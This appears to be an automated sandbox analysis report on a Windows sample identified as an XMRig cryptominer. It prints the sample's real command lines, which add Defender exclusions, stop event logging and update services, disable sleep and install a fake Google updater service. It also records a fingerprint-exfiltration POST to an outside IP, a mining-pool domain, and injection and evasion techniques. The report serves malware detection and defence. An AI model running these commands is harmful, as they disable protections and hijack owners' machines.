
Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1549199
MD5:73a56908097ee57dd4217877aeae4641
SHA1:a41cc3570f40f9688b2ac9f5e7326150a3a350a6
SHA256:fde56e00761a85ad495bd2d05654f3657922f665f58edfabcf43d2fa769f0d79
Tags:exeuser-Bitsight

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 73A56908097EE57DD4217877AEAE4641)
    • powershell.exe (PID: 7660 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7892 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7972 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7900 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7996 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8036 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8080 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8128 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8176 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8184 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7180 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7224 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7296 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 584 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 7392 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5556 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3920 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 352 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 3760 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: 73A56908097EE57DD4217877AEAE4641)
    • powershell.exe (PID: 7440 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7688 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7820 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7984 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7988 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7996 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8052 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8124 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8104 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8116 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8140 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7176 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 436 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 376 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1028 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1036 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 5948 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 5568 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Yara matches, memory dumps (Source / Rule / Description / Author / Strings)
Source: 00000041.00000003.2002764308.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Xmrig (Joe Security): Yara detected Xmrig cryptocurrency miner
Source: 00000041.00000003.1931884309.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Xmrig (Joe Security): Yara detected Xmrig cryptocurrency miner
Source: 00000041.00000002.2575912282.000001E2F6861000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Xmrig (Joe Security): Yara detected Xmrig cryptocurrency miner
Source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp
  Rule: JoeSecurity_Xmrig (Joe Security): Yara detected Xmrig cryptocurrency miner
  Rule: MacOS_Cryptominer_Xmrig_241780a1 (description: unknown, author: unknown)
    • 0x37eb98:$a1: mining.set_target
    • 0x370e20:$a2: XMRIG_HOSTNAME
    • 0x373748:$a3: Usage: xmrig [OPTIONS]
    • 0x370df8:$a4: XMRIG_VERSION

Yara matches, unpacked PEs (Source / Rule / Description / Author / Strings)
Source: 65.2.dialer.exe.140000000.0.unpack
  Rule: JoeSecurity_Xmrig (Joe Security): Yara detected Xmrig cryptocurrency miner
  Rule: MacOS_Cryptominer_Xmrig_241780a1 (description: unknown, author: unknown)
    • 0x37ef98:$a1: mining.set_target
    • 0x371220:$a2: XMRIG_HOSTNAME
    • 0x373b48:$a3: Usage: xmrig [OPTIONS]
    • 0x3711f8:$a4: XMRIG_VERSION
  Rule: MAL_XMR_Miner_May19_1 (Florian Roth): Detects Monero Crypto Coin Miner
    • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
  Rule: MALWARE_Win_CoinMiner02 (ditekSHen): Detects coinmining malware
    • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
    • 0x3cd180:$s3: \\.\WinRing0_
    • 0x376148:$s4: pool_wallet
    • $s5: cryptonight, 18 hits at 0x3705f0, 0x370600, 0x370610, 0x370620, 0x370638, 0x370648, 0x370658, 0x370670, 0x370680, 0x370698, 0x3706b0, 0x3706c0, 0x3706d0, 0x3706e0, 0x3706f8, 0x370710, 0x370720, 0x370730

            Change of critical system settings

            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 8176, ProcessName: powercfg.exe

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7660, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 7296, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 5556, ProcessName: sc.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7660, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7612, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3920, ProcessName: sc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-05T12:24:41.243644+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.9 | 49794 | TCP
2024-11-05T12:25:18.678723+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.9 | 49976 | TCP
2024-11-05T12:24:36.141321+0100 | 2044697 | 1 | A Network Trojan was detected | 192.168.2.9 | 49768 | 162.230.48.189 | 80 | TCP
2024-11-05T12:25:35.977063+0100 | 2044697 | 1 | A Network Trojan was detected | 192.168.2.9 | 49984 | 162.230.48.189 | 80 | TCP


            AV Detection

            Source: C:\ProgramData\Google\Chrome\updater.exeReversingLabs: Detection: 55%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

            Bitcoin Miner

            Source: Yara matchFile source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000041.00000003.2002764308.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000041.00000003.1931884309.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000041.00000002.2575912282.000001E2F6861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
            Source: dialer.exeString found in binary or memory: cryptonight-monerov7
            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCDCE0 FindFirstFileExW,31_2_000001F385BCDCE0
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A29199DCE0 FindFirstFileExW,34_2_000002A29199DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDDCE0 FindFirstFileExW,40_2_0000014E25EDDCE0
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F4DCE0 FindFirstFileExW,41_2_00000283E0F4DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539CDCE0 FindFirstFileExW,66_2_000001FB539CDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BDDCE0 FindFirstFileExW,67_2_000001CBD8BDDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD16DCE0 FindFirstFileExW,68_2_000001F2BD16DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BADCE0 FindFirstFileExW,69_2_00000229F8BADCE0

            Networking

            Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.9:49768 -> 162.230.48.189:80
            Source: Network trafficSuricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.9:49984 -> 162.230.48.189:80
            Source: global trafficTCP traffic: 192.168.2.9:49762 -> 149.102.143.109:20128
            Source: Joe Sandbox ViewIP Address: 149.102.143.109 149.102.143.109
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49976
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:49794
Source: unknown; TCP traffic detected without corresponding DNS query: 162.230.48.189 (reported 12 times, one per connection)
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: gulf.moneroocean.stream
            Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 283Content-Type: application/jsonHost: 162.230.48.189User-Agent: cpp-httplib/0.12.6
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: lsass.exe, 00000022.00000002.2577979722.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: lsass.exe, 00000022.00000002.2578503702.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: lsass.exe, 00000022.00000002.2578503702.000002A29139C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000003.1496236329.000002A2913F6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
            Source: updater.exe, 00000025.00000003.1419565451.000001A38C040000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2578713506.000002A2913A8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A2913A2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: lsass.exe, 00000022.00000002.2578503702.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: lsass.exe, 00000022.00000002.2577979722.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1392563584.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1391816998.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: lsass.exe, 00000022.00000002.2578503702.000002A29139C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000003.1496236329.000002A2913F6000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
